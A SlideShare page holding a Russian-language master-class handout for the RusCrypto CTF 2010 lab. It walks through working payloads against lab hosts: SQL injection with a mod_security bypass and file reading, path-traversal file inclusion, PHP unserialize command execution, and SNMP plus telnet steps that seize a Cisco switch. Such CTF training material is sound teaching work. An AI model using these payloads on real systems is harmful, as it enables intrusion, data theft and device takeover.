SlideShare a Scribd company logo
1 of 7
«РУСКРИПТО CTF 2010, FULL DISCLOSURE»
МАСТЕР КЛАСС
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 2 из 7
ОГЛАВЛЕНИЕ
1 ЗАДАНИЯ МАСТЕР КЛАССА ................................................................. 3
1.1 ПРАКТИЧЕСКОЕ ЗАНЯТИЕ ЧАСТЬ 1 3
1.2 ПРАКТИЧЕСКОЕ ЗАНЯТИЕ ЧАСТЬ 2 5
1.3 ДОПОЛНИТЕЛЬНЫЕ МАТЕРИАЛЫ 7
1.3.1 СС ЫЛКИ НА ДО ПО ЛНИТЕ ЛЬН ЫЕ МА ТЕРИА ЛЫ.......................................................... 7
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 3 из 7
1 Задания мастер класса
1.1 Практическое занятие, часть 1
Действие Описание
Примечание: Для выполнения заданий «Практическогозанятия 1» необходимо использовать браузер Mozilla Firefox с
установленнымдополнением«TamperData» (https://addons.mozilla.org/firefox/addon/966).
1. Обнаружить
уязвимость SQL
Injection
a. Откройте интерфейс http://192.168.0.1/
b. Укажите в качестве значений «пицца»и «скорость доставки» произвольные данные.
c. Путем перехвата данных средствами «TamperData» вкачестве значения «time»
укажите 1'
d. Вы должны увидеть следующее сообщение об ошибке:
Query failed:You have an error in your SQLsyntax
e. Стоит отметить,что уязвимость содержится вследующем SQL-запросе:
INSERTINTO pizza (pizza,time) VALUES (".$_POST['pizza'].",".$_POST['time'].")
2. Обойти
превентивные
защитные
механизмы (WAF)
a. В том же интерфейсе укажите вкачестве значения «time» 1 unionselect
b. Вы должны увидеть сообщение, свидетельствующее о блокировке запроса
превентивным защитныммеханизмом Mod_Security:
Method NotImplemented
c. Вернитесь на предыдущую страницуи воспользуйтесьметодомобхода правил
противодействия атаке «Внедрение операторов SQL» в Mod_Security.Для этого в
качестве значения «time» укажите:
/*!unionselect*/
/*!12345unionselect*/
d. Полученное сообщениеоб ошибке (…syntax to use near 'unionselect*/)'…)
свидетельствует о том,что существуетвозможность контролировать поступающие к
веб-приложениюзапросы,которые,всвою очередь,используются для генерации
SQL-запросов в обход политики безопасности Web ApplicationFirewall.
3. Воспользоваться
уязвимостью SQL
Injection для
получения «флага»
a. Для получения флага воспользуйтесьтехникой проведения атаки Error-based SQL
Injection:
select1 from(selectcount(*),concat(1,floor(rand(0)*2))x from pizza group by x)a
b. Обратите внимание,что вбольшинстве версий MySQLприведенный выше метод
позволяетполучить не больше 153 символовполезной нагрузки (и меньше!).
Поэтому для получения флага в данном случае можноиспользовать следующий
запрос:selectmid(load_file('/YOURFLAG.TXT'),451,32)
c. Таким образом,результирующий запрос для проведения атаки приметследующий
вид:
/*!12345(select1 from(selectcount(*),concat((select
mid(load_file('/YOURFLAG.TXT'),451,32)),floor(rand(0)*2))x from pizza group by
x)a)*/
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 4 из 7
Действие Описание
4. Воспользоваться
уязвимостью Local
File Including для
получения «флага»
a. Прежде чем перейти кэксплуатации уязвимости «LocalFile Including» авторизуйтесь
в интерфейсе http://192.168.0.1/admin.php
Имя пользователя:admin
Пароль:1234567
b. После успешной авторизации повторите запрос.При этом измените значение
Cookie[lang]на следующую строку:
non/../../../../../../etc/hosts
c. Вы должны увидеть следующее сообщение об ошибке:
Warning:include_once(non/../../../../../../etc/hosts.php)
Попробуйте заменить «hosts»на «passwd».
Попробуйте заменить «hosts»на «hosts%00».
d. Для того чтобы избавится отдобавляемогорасширения файла («.php»),
воспользуйтесь методом замены«ядовитого нуля»в PHP < v.5.3.3. Следующая
конструкция позволяетосуществить атаку:
non/../../../../../../YOURFLAG.TXT/./.[496]/./.
Попробуйте воспользоваться уязвимостью «Remote File Including» втом же
уязвимомпараметре.
Примечание: Следующее задание требуетперевода состояния виртуальной инфраструктурына уровень выше.Если
Вы закончили предыдущие задания раньше остальныхучастников,попробуйте воспользоваться уязвимостями типа
«XPath Injection» и «SQLInjection» на интерфейсеhttp://192.168.0.2. Для получения «флага»при эксплуатации
уязвимости «SQLInjection» воспользуйтесь функцией pg_read_file().«Флаг» содержится водном каталоге с СУБД.
5. Воспользоваться
уязвимостью при
вызове функции
unserialize()с целью
выполнения команд
ОС и для получения
«флага»
a. Прежде,чем перейти кэксплуатации уязвимости при вызове функцииunserialize(),
отключите автоматическое перенаправлениебраузера.
b. Откройте интерфейс http://192.168.0.1/admin.php. Уязвимость содержится в
параметре Cookie[sessid].Следующий запросвформате base64позволяетвыполнить
функцию phpinfo():
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:7:"phpinfo";i:1;s:2:"-1";}}
c. Приведенный запрос ниже в том же формате позволитвыполнить команду листинга
файлови каталогов в текущем каталоге веб-сервера:
O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:6:"system";i:1;s:2:"ls";}}
d. Воспользуйтесь данной уязвимостью для чтения файла «/YOURFLAG.TXT».
Примечание: Интерфейс для перевода строки вформатbase64доступен по адресу http://192.168.0.1/base64.php
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 5 из 7
1.2 Практическое занятие, часть 2
Действие Описание
Примечание: Для выполнения заданий «Практическогозанятия 2» необходимо использовать ПО«net-snmp»
(http://www.net-snmp.org/download.html)и «Tftpd32» (http://tftpd32.jounin.net/).Опциональноможно использовать ПО
«nmap» (http://nmap.org/download.html).
1. Провести выгрузку
используемой
конфигурации через
протоколSNMP
a. Проверьте доступность коммутатора Cisco путем отправки запроса ICMPEcho-
Request:
ping 192.168.0.10
Для аналогичныхцелей можно воспользоваться сетевым сканером nmap:
nmap -sP -n 192.168.0.10
b. Вы должны увидеть, что коммутаторявляется доступным.
Кроме того,можно проверить доступность порта SNMP(161/udp)и использование
настроекпо умолчанию:
nmap -sU -n -p 161 192.168.0.10
snmpwalk -v 1 -c public 192.168.0.10 iso.3.6.1.2.1.1.1.0
snmpwalk -v 1 -c private 192.168.0.10 iso.3.6.1.2.1.1.1.0
c. Запустите сервер TFTPDи укажите используемый каталогдля принимаемых
файлов.
d. Используйте команду (используемый протокол):
snmpset -v 1 -c private 192.168.0.10
.1.3.6.1.4.1.9.9.96.1.1.1.1.2.<произвольное_число> integer 1
integer1 для протокола TFTP
integer2 для протокола FTP
integer3 для протокола RSCP
Строка «1.3.6.1.4.1.9.9.96.1.1.1.1.» является фиксированнымзначениемOIDиз
состава CISCO-CONFIG-COPY-MIB.
e. Используйте команду (файл-источник):
snmpset -v 1 -c private 192.168.0.10
.1.3.6.1.4.1.9.9.96.1.1.1.1.3.<используемое_произвольное_число> integer 4
integer1 копирование файла изсети
integer2 копирование любого неконфигурационного локального файла
integer3 копирование startup-config
integer4 копирование running-config
integer5 копирование терминального вывода
f. Используйте команду (файл-назначение):
snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.4.
.<используемое_произвольное_число> integer 1
Значения «integer»аналогичны предыдущемупункту.
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 6 из 7
Действие Описание
g. Используйте команду (указание адреса TFTP-сервера):
snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.5.
<используемое_произвольное_число> address <IP_адрес_вашего_компьютера>
h. Используйте команду (указание имени файла на стороне TFTP-сервера):
snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.6.
<используемое_произвольное_число> string config
i. Используйте команду (запустить процесс копирования):
snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.14.
<используемое_произвольное_число> integer 1
j. Используйте команду:
snmpwalk -v 1 -c private 192.168.0.10 .1.3.6.1.4.1.9.9.96.1.1.1.1.10.
<используемое_произвольное_число>
для того чтобы определить состояние процесса копирования,и команду:
snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.14.
<используемое_произвольное_число> integer 6
для того чтобы удалить созданную ячейку OID.
k. На этом этапе Вы должны получить файлс конфигурацией, используемой (running-
config)на коммутатореCisco.
2. Получить уровень
доступа privileges 15
a. Внимательно изучите полученнуюконфигурацию коммутатора Cisco.Обратите
внимание на следующие строчки:
...
aaa authentication login default local-case
aaa authentication login authennone
...
line vty 0 3
exec-timeout 0 0
line vty 4
exec-timeout 0 0
privilege level 15
login authenticationauthen
...
Подобная конфигурация устройства позволяетполучить уровень доступа privileges
15 безкакой-либо аутентификации.
b. Запустите несколько окон командной строки со следующим содержимым:
telnet192.168.0.10
c. Вы должны получить неавторизованный доступ кустройству Cisco.Проверить
полученные привилегии можно командой:
show privilege
Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 7 из 7
1.3 Дополнительные материалы
1.3.1 Ссылки на дополнительные материалы
 http://www.ptsecurity.ru/download/PT-Ruscrypto-CTF2010.pdf
 http://devteev.blogspot.com/2010/04/2010-ctf-just4fun.html
 http://www.ruscrypto.org/conference/ctf/
И в светлом будущем:
 http://ctf.securitylab.ru/

More Related Content

What's hot

РусКрипто CTF 2010 Full Disclosure (мастер класс)
РусКрипто CTF 2010 Full Disclosure (мастер класс)РусКрипто CTF 2010 Full Disclosure (мастер класс)
РусКрипто CTF 2010 Full Disclosure (мастер класс)Dmitry Evteev
 
Fabric для управления серверами
Fabric для управления серверамиFabric для управления серверами
Fabric для управления серверамиMaxim Kulsha
 
poudriere или как я перестал волноваться и полюбил pkg
poudriere или как я перестал волноваться и полюбил pkgpoudriere или как я перестал волноваться и полюбил pkg
poudriere или как я перестал волноваться и полюбил pkgAndrey Fesenko
 
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Kristina Pomozova
 
Применение фреймворка GStreamer в системе видеонаблюдения
Применение фреймворка GStreamer в системе видеонаблюденияПрименение фреймворка GStreamer в системе видеонаблюдения
Применение фреймворка GStreamer в системе видеонаблюденияcorehard_by
 
Другая виртуализация
Другая виртуализацияДругая виртуализация
Другая виртуализацияYandex
 
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...Ontico
 
Web осень 2012 лекция 3
Web осень 2012 лекция 3Web осень 2012 лекция 3
Web осень 2012 лекция 3Technopark
 
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"Yandex
 
NeoQUEST: Tpm.txt.на что способно заморское железо
NeoQUEST: Tpm.txt.на что способно заморское железоNeoQUEST: Tpm.txt.на что способно заморское железо
NeoQUEST: Tpm.txt.на что способно заморское железоNeo_QUEST
 
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)Ontico
 
CUDA Course 2010 at MSU
CUDA Course 2010 at MSUCUDA Course 2010 at MSU
CUDA Course 2010 at MSUlarhat
 
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной сб...
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной   сб...Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной   сб...
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной сб...Minsk Linux User Group
 
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...Iosif Itkin
 

What's hot (14)

РусКрипто CTF 2010 Full Disclosure (мастер класс)
РусКрипто CTF 2010 Full Disclosure (мастер класс)РусКрипто CTF 2010 Full Disclosure (мастер класс)
РусКрипто CTF 2010 Full Disclosure (мастер класс)
 
Fabric для управления серверами
Fabric для управления серверамиFabric для управления серверами
Fabric для управления серверами
 
poudriere или как я перестал волноваться и полюбил pkg
poudriere или как я перестал волноваться и полюбил pkgpoudriere или как я перестал волноваться и полюбил pkg
poudriere или как я перестал волноваться и полюбил pkg
 
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
 
Применение фреймворка GStreamer в системе видеонаблюдения
Применение фреймворка GStreamer в системе видеонаблюденияПрименение фреймворка GStreamer в системе видеонаблюдения
Применение фреймворка GStreamer в системе видеонаблюдения
 
Другая виртуализация
Другая виртуализацияДругая виртуализация
Другая виртуализация
 
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...
Быстрое прототипирование бэкенда игры с геолокацией на OpenResty, Redis и Doc...
 
Web осень 2012 лекция 3
Web осень 2012 лекция 3Web осень 2012 лекция 3
Web осень 2012 лекция 3
 
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"
Владимир Алаев "Разработка на Node.js: инструменты, библиотеки, сервисы"
 
NeoQUEST: Tpm.txt.на что способно заморское железо
NeoQUEST: Tpm.txt.на что способно заморское железоNeoQUEST: Tpm.txt.на что способно заморское железо
NeoQUEST: Tpm.txt.на что способно заморское железо
 
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)
5 способов деплоя PHP-кода в условиях хайлоада / Юрий Насретдинов (Badoo)
 
CUDA Course 2010 at MSU
CUDA Course 2010 at MSUCUDA Course 2010 at MSU
CUDA Course 2010 at MSU
 
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной сб...
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной   сб...Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной   сб...
Дмитрий Перлов openSUSE Build Server: tips & tricks кросс-дистрибутивной сб...
 
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...
Moscow Exchange Test Automation of a Backup System at TMPA-2014 (Trading Syst...
 

Similar to РусКрипто CTF 2010 Full Disclosure (мастер класс)

Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Dmitry Evteev
 
Программируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusПрограммируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusCisco Russia
 
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...Positive Hack Days
 
Руководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCРуководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCCisco Russia
 
Tarantool Modules, Tarantool Meetup 2016-08-25
Tarantool Modules, Tarantool Meetup 2016-08-25Tarantool Modules, Tarantool Meetup 2016-08-25
Tarantool Modules, Tarantool Meetup 2016-08-25Roman Tsisyk
 
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязи
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязиОсновные уязвимости и методы защиты оборудования и ПО видеоконференцсвязи
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязиCisco Russia
 
Управление большим количеством физических серверов, Александр Берсенев, Инст...
 Управление большим количеством физических серверов, Александр Берсенев, Инст... Управление большим количеством физических серверов, Александр Берсенев, Инст...
Управление большим количеством физических серверов, Александр Берсенев, Инст...it-people
 
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)Ontico
 
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14Serguei Gitinsky
 
Стек протоколов для IoT. Пример использования SNMP
Стек протоколов для IoT. Пример использования SNMPСтек протоколов для IoT. Пример использования SNMP
Стек протоколов для IoT. Пример использования SNMPIntersog
 
Froglogic Squish
Froglogic Squish Froglogic Squish
Froglogic Squish SQALab
 
Устройство фреймворка symfony 2 (http://frontend-dev.ru)
Устройство фреймворка symfony 2 (http://frontend-dev.ru)Устройство фреймворка symfony 2 (http://frontend-dev.ru)
Устройство фреймворка symfony 2 (http://frontend-dev.ru)Александр Егурцов
 
Статический анализ: ошибки в медиаплеере и безглючная аська
Статический анализ: ошибки в медиаплеере и безглючная аська Статический анализ: ошибки в медиаплеере и безглючная аська
Статический анализ: ошибки в медиаплеере и безглючная аська Tatyanazaxarova
 
IoT Protocols #iotconfua
IoT Protocols #iotconfuaIoT Protocols #iotconfua
IoT Protocols #iotconfuaAndy Shutka
 
Операционные системы и среды
Операционные системы и средыОперационные системы и среды
Операционные системы и средыAlexandr Konfidentsialno
 
Teach your dockers to use CRanes
Teach your dockers to use CRanesTeach your dockers to use CRanes
Teach your dockers to use CRanesPavel Emelyanov
 
Оптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesОптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesPlatonov Sergey
 
Оптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesОптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesPlatonov Sergey
 
Использование Open Source инструментов для автоматизации тестирования
Использование Open Source инструментов для автоматизации тестированияИспользование Open Source инструментов для автоматизации тестирования
Использование Open Source инструментов для автоматизации тестированияSQALab
 

Similar to РусКрипто CTF 2010 Full Disclosure (мастер класс) (20)

Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
 
Программируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco NexusПрограммируемость коммутаторов для ЦОД Cisco Nexus
Программируемость коммутаторов для ЦОД Cisco Nexus
 
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...
Positive Hack Days. Павлов. Мастер-класс: Анализ защищенности сетевой инфраст...
 
Руководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPCРуководство по началу самостоятельной работы с CSPC
Руководство по началу самостоятельной работы с CSPC
 
Tarantool Modules, Tarantool Meetup 2016-08-25
Tarantool Modules, Tarantool Meetup 2016-08-25Tarantool Modules, Tarantool Meetup 2016-08-25
Tarantool Modules, Tarantool Meetup 2016-08-25
 
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязи
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязиОсновные уязвимости и методы защиты оборудования и ПО видеоконференцсвязи
Основные уязвимости и методы защиты оборудования и ПО видеоконференцсвязи
 
Управление большим количеством физических серверов, Александр Берсенев, Инст...
 Управление большим количеством физических серверов, Александр Берсенев, Инст... Управление большим количеством физических серверов, Александр Берсенев, Инст...
Управление большим количеством физических серверов, Александр Берсенев, Инст...
 
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)
nginx.CHANGES.2015 / Игорь Сысоев, Валентин Бартенев (Nginx)
 
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14
CFEngine, Puppet, Chef, SAltStack and Ansible Failover'14
 
Стек протоколов для IoT. Пример использования SNMP
Стек протоколов для IoT. Пример использования SNMPСтек протоколов для IoT. Пример использования SNMP
Стек протоколов для IoT. Пример использования SNMP
 
Froglogic Squish
Froglogic Squish Froglogic Squish
Froglogic Squish
 
Устройство фреймворка symfony 2 (http://frontend-dev.ru)
Устройство фреймворка symfony 2 (http://frontend-dev.ru)Устройство фреймворка symfony 2 (http://frontend-dev.ru)
Устройство фреймворка symfony 2 (http://frontend-dev.ru)
 
Статический анализ: ошибки в медиаплеере и безглючная аська
Статический анализ: ошибки в медиаплеере и безглючная аська Статический анализ: ошибки в медиаплеере и безглючная аська
Статический анализ: ошибки в медиаплеере и безглючная аська
 
IoT Conf UA 2016
IoT Conf UA 2016IoT Conf UA 2016
IoT Conf UA 2016
 
IoT Protocols #iotconfua
IoT Protocols #iotconfuaIoT Protocols #iotconfua
IoT Protocols #iotconfua
 
Операционные системы и среды
Операционные системы и средыОперационные системы и среды
Операционные системы и среды
 
Teach your dockers to use CRanes
Teach your dockers to use CRanesTeach your dockers to use CRanes
Teach your dockers to use CRanes
 
Оптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesОптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templates
 
Оптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templatesОптимизация трассирования с использованием Expression templates
Оптимизация трассирования с использованием Expression templates
 
Использование Open Source инструментов для автоматизации тестирования
Использование Open Source инструментов для автоматизации тестированияИспользование Open Source инструментов для автоматизации тестирования
Использование Open Source инструментов для автоматизации тестирования
 

More from Dmitry Evteev

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Dmitry Evteev
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Dmitry Evteev
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Dmitry Evteev
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБОDmitry Evteev
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...Dmitry Evteev
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системDmitry Evteev
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банковDmitry Evteev
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future NowDmitry Evteev
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный вебDmitry Evteev
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеровDmitry Evteev
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftDmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоDmitry Evteev
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийDmitry Evteev
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийDmitry Evteev
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестированийDmitry Evteev
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестераDmitry Evteev
 

More from Dmitry Evteev (20)

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...
 
penetest VS. APT
penetest VS. APTpenetest VS. APT
penetest VS. APT
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБО
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских систем
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банков
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future Now
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный веб
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеров
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это было
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учреждений
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложений
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестирований
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестера
 

РусКрипто CTF 2010 Full Disclosure (мастер класс)

  • 1. «РУСКРИПТО CTF 2010, FULL DISCLOSURE» МАСТЕР КЛАСС
